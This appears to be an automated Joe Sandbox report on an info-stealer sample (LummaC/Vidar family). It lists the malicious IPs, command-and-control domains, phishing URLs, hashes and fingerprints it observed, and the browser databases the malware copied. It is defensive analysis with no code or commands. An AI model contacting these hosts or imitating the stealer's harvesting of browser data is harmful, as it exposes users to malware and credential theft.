                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          95.164.119.162
                          		stadiatechnologies.comGibraltar
                          		39762VAKPoltavaUkraineUAtrue
                          23.197.127.21
                          		steamcommunity.comUnited States
                          		20940AKAMAI-ASN1EUtrue
                          94.130.188.148
                          		unknownGermany
                          		24940HETZNER-ASDEtrue

                          General Information

                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1501386
                          Start date and time:2024-08-29 20:46:05 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 9m 9s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:19
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:file.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@23/36@3/3
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 88
                          • Number of non-executed functions: 303
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                          Warnings

                          • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 104.208.16.94
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, 6.d.a.8.b.e.f.b.0.0.0.0.0.0.0.0.4.0.0.a.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size exceeded maximum capacity and may have missing disassembly code.
                          • Report size getting too big, too many NtOpenFile calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtSetInformationFile calls found.
                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • VT rate limit hit for: file.exe

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          14:46:52API Interceptor1x Sleep call for process: file.exe modified
                          14:47:31API Interceptor3570x Sleep call for process: Tenant.pif modified
                          14:50:17API Interceptor1x Sleep call for process: WerFault.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          95.164.119.162file.exeGet hashmaliciousLummaC, VidarBrowse
                          • stadiatechnologies.com/
                          file.exeGet hashmaliciousLummaC, VidarBrowse
                          • stadiatechnologies.com/
                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                          • stadiatechnologies.com/
                          file.exeGet hashmaliciousLummaC, VidarBrowse
                          • stadiatechnologies.com/
                          file.exeGet hashmaliciousLummaC, VidarBrowse
                          • stadiatechnologies.com/
                          file.exeGet hashmaliciousLummaC, VidarBrowse
                          • stadiatechnologies.com/
                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                          • stadiatechnologies.com/
                          file.exeGet hashmaliciousLummaC, VidarBrowse
                          • stadiatechnologies.com/
                          file.exeGet hashmaliciousLummaC, VidarBrowse
                          • stadiatechnologies.com/
                          file.exeGet hashmaliciousLummaC, VidarBrowse
                          • stadiatechnologies.com/
                          23.197.127.21http://steamcomunity.aiq.ru/Get hashmaliciousUnknownBrowse
                          • steamcommunity.com/
                          94.130.188.148file.exeGet hashmaliciousLummaC, VidarBrowse
                            file.exeGet hashmaliciousLummaC, VidarBrowse
                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                  file.exeGet hashmaliciousLummaC, VidarBrowse
                                    file.exeGet hashmaliciousLummaC, VidarBrowse
                                      file.exeGet hashmaliciousLummaC, VidarBrowse
                                        file.exeGet hashmaliciousLummaC, VidarBrowse
                                          Setup.exeGet hashmaliciousVidarBrowse
                                            file.exeGet hashmaliciousVidarBrowse

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              stadiatechnologies.comfile.exeGet hashmaliciousLummaC, VidarBrowse
                                              • 95.164.119.162
                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                              • 95.164.119.162
                                              file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                              • 95.164.119.162
                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                              • 95.164.119.162
                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                              • 95.164.119.162
                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                              • 95.164.119.162
                                              file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                              • 95.164.119.162
                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                              • 95.164.119.162
                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                              • 95.164.119.162
                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                              • 95.164.119.162
                                              steamcommunity.comfile.exeGet hashmaliciousLummaC, VidarBrowse
                                              • 23.199.218.33
                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                              • 23.192.247.89
                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                              • 23.192.247.89
                                              file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                              • 23.197.127.21
                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                              • 23.197.127.21
                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                              • 23.197.127.21
                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                              • 2.18.131.137
                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                              • 23.192.247.89
                                              Setup.exeGet hashmaliciousVidarBrowse
                                              • 23.214.234.105
                                              file.exeGet hashmaliciousVidarBrowse
                                              • 23.197.127.21

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              VAKPoltavaUkraineUAfile.exeGet hashmaliciousLummaC, VidarBrowse
                                              • 95.164.119.162
                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                              • 95.164.119.162
                                              file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                              • 95.164.119.162
                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                              • 95.164.119.162
                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                              • 95.164.119.162
                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                              • 95.164.119.162
                                              file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                              • 95.164.119.162
                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                              • 95.164.119.162
                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                              • 95.164.119.162
                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                              • 95.164.119.162
                                              HETZNER-ASDESepco RFQ.xlsGet hashmaliciousRemcosBrowse
                                              • 88.99.66.38
                                              Thermo Fisher RFQ_TFS-1805.xlsGet hashmaliciousGuLoaderBrowse
                                              • 88.99.66.38
                                              Swift Payment.xlsGet hashmaliciousFormBookBrowse
                                              • 88.99.66.38
                                              Paul Agrotis List.xlsGet hashmaliciousFormBookBrowse
                                              • 88.99.66.38
                                              http://control.frilix.com/grace/fxc/aW5mby5jcmVkaXRldXJlbkBicmVkYS5ubA==Get hashmaliciousHTMLPhisherBrowse
                                              • 88.99.252.96
                                              IDM_ACT.exeGet hashmaliciousFredy StealerBrowse
                                              • 5.161.243.5
                                              IDM_ACT.exeGet hashmaliciousFredy StealerBrowse
                                              • 5.161.243.5
                                              PMT-INV0230824AUG.xla.xlsxGet hashmaliciousRemcosBrowse
                                              • 88.99.66.38
                                              PO-014842-2.xlsGet hashmaliciousFormBookBrowse
                                              • 88.99.66.38
                                              ORDER.xlsGet hashmaliciousUnknownBrowse
                                              • 88.99.66.38
                                              AKAMAI-ASN1EUhttps://cvccworks-my.sharepoint.com/:o:/g/personal/tbrosseau_cvccworks_edu/Eq-UyPVcAplCp0EtULhG-vgBSBG-0YnvqRHIOFaj8gAVeA?e=0GtZle&c=E,1,DChFGbEapD80-9FdFFEzIgnps7b6noVGZQKGJYQxe5NZ1bO4xoHQSXTZoDZYFQom26YXPkpXr4g-Zcy6HwaX1DHyE-5Bk2WBwo9od82Z27DPdBWYzulyG2zvnA,,&typo=1Get hashmaliciousHTMLPhisherBrowse
                                              • 2.16.164.49
                                              file.exeGet hashmaliciousUnknownBrowse
                                              • 23.44.133.38
                                              http://www.water-filter.comGet hashmaliciousHTMLPhisherBrowse
                                              • 23.67.131.235
                                              file.exeGet hashmaliciousUnknownBrowse
                                              • 23.219.161.132
                                              file.exeGet hashmaliciousUnknownBrowse
                                              • 23.44.133.57
                                              file.exeGet hashmaliciousUnknownBrowse
                                              • 23.200.0.9
                                              5qckfVuvzX.exeGet hashmaliciousRHADAMANTHYSBrowse
                                              • 172.236.107.96
                                              file.exeGet hashmaliciousUnknownBrowse
                                              • 23.219.161.132
                                              file.exeGet hashmaliciousUnknownBrowse
                                              • 23.219.161.132
                                              file.exeGet hashmaliciousUnknownBrowse
                                              • 23.200.0.42

                                              JA3 Fingerprints

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              51c64c77e60f3980eea90869b68c58a8file.exeGet hashmaliciousLummaC, VidarBrowse
                                              • 94.130.188.148
                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                              • 94.130.188.148
                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                              • 94.130.188.148
                                              file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                              • 94.130.188.148
                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                              • 94.130.188.148
                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                              • 94.130.188.148
                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                              • 94.130.188.148
                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                              • 94.130.188.148
                                              Setup.exeGet hashmaliciousVidarBrowse
                                              • 94.130.188.148
                                              file.exeGet hashmaliciousVidarBrowse
                                              • 94.130.188.148
                                              37f463bf4616ecd445d4a1937da06e19Invoice.wsfGet hashmaliciousAsyncRAT, PureLog StealerBrowse
                                              • 23.197.127.21
                                              x64_installer__v4.6.0.msiGet hashmaliciousUnknownBrowse
                                              • 23.197.127.21
                                              SHIPMENT_DOCMSS24071327.exeGet hashmaliciousGuLoaderBrowse
                                              • 23.197.127.21
                                              hhs.exeGet hashmaliciousUnknownBrowse
                                              • 23.197.127.21
                                              x64_installer__v4.5.9.msiGet hashmaliciousUnknownBrowse
                                              • 23.197.127.21
                                              3Ojkq6hcM1.msiGet hashmaliciousUnknownBrowse
                                              • 23.197.127.21
                                              Nettably.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 23.197.127.21
                                              WEAREX_IHRACAT.exeGet hashmaliciousGuLoaderBrowse
                                              • 23.197.127.21
                                              Fordybendes.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                              • 23.197.127.21

                                              Dropped Files

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              C:\ProgramData\freebl3.dllfile.exeGet hashmaliciousStealc, VidarBrowse
                                                eSLlhErJ0q.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                                        file.exeGet hashmaliciousStealc, VidarBrowse
                                                          file.exeGet hashmaliciousStealc, VidarBrowse
                                                            file.exeGet hashmaliciousLummaC, VidarBrowse
                                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                                                file.exeGet hashmaliciousStealc, VidarBrowse
                                                                  C:\ProgramData\mozglue.dllfile.exeGet hashmaliciousStealc, VidarBrowse
                                                                    eSLlhErJ0q.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                                                        file.exeGet hashmaliciousStealc, VidarBrowse
                                                                          file.exeGet hashmaliciousStealc, VidarBrowse
                                                                            file.exeGet hashmaliciousStealc, VidarBrowse
                                                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                    file.exeGet hashmaliciousStealc, VidarBrowse

                                                                                      Created / dropped Files

                                                                                      C:\ProgramData\EBGDAAKJJDAA\CBFCBK

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      File Type:ASCII text, with very long lines (1743), with CRLF line terminators
                                                                                      Category:modified
                                                                                      Size (bytes):9504
                                                                                      Entropy (8bit):5.512408163813622
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
                                                                                      MD5:1191AEB8EAFD5B2D5C29DF9B62C45278
                                                                                      SHA1:584A8B78810AEE6008839EF3F1AC21FD5435B990
                                                                                      SHA-256:0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
                                                                                      SHA-512:86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
                                                                                      Malicious:false
                                                                                      Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                      C:\ProgramData\EBGDAAKJJDAA\CBKJJJ

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\ProgramData\EBGDAAKJJDAA\CFCFHJ

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):98304
                                                                                      Entropy (8bit):0.08235737944063153
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\ProgramData\EBGDAAKJJDAA\CFCFHJ-shm

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):32768
                                                                                      Entropy (8bit):0.017262956703125623
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                      Malicious:false
                                                                                      Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\ProgramData\EBGDAAKJJDAA\CGDHIE

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.6732424250451717
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                      MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                      SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                      SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                      SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\ProgramData\EBGDAAKJJDAA\DHCBGD

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                      Category:dropped
                                                                                      Size (bytes):196608
                                                                                      Entropy (8bit):1.121297215059106
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\ProgramData\EBGDAAKJJDAA\HJJEHJ

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):155648
                                                                                      Entropy (8bit):0.5407252242845243
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                      MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                      SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                      SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                      SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\ProgramData\EBGDAAKJJDAA\HJKECA

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):5242880
                                                                                      Entropy (8bit):0.03859996294213402
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                                                                      MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                                                                      SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                                                                      SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                                                                      SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\ProgramData\EBGDAAKJJDAA\HJKECA-shm

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):32768
                                                                                      Entropy (8bit):0.017262956703125623
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                      Malicious:false
                                                                                      Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\ProgramData\EBGDAAKJJDAA\KEBKJD

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.136413900497188
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\ProgramData\EBGDAAKJJDAA\KKFCFB

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.8439810553697228
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                      MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                      SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                      SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                      SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Tenant.pif_be3b5fd70a97d20232ec5eb2c2b41225cfbc6c_d7523e16_bb464c9d-213e-4933-a378-eaf22e7b9825\Report.wer

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):65536
                                                                                      Entropy (8bit):1.3099755344617887
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:cL7qv9JbW0BU/gjKhU44IZr8xrdzuiFBZ24IO8cC7:c6v9Jb9BU/gjVrdzuiFBY4IO8h7
                                                                                      MD5:452F1E82958D96EA78C482146D90ED4B
                                                                                      SHA1:6B9831C51686C6162EC0FA97301041BB11DA3E27
                                                                                      SHA-256:9DD938CFC8C0BBECEF580F1F3BB1FC5746C8A177EB03D9E8A177DAD0B99D7AB9
                                                                                      SHA-512:E178E053BDC98A35BB5F9BE54A296709C00AFA0249DEF3F884B9AEA05B83F17D44A7274A04BEB12A6092975FEA06F65125A8D4C1B561F9C1B64A21288690459F
                                                                                      Malicious:false
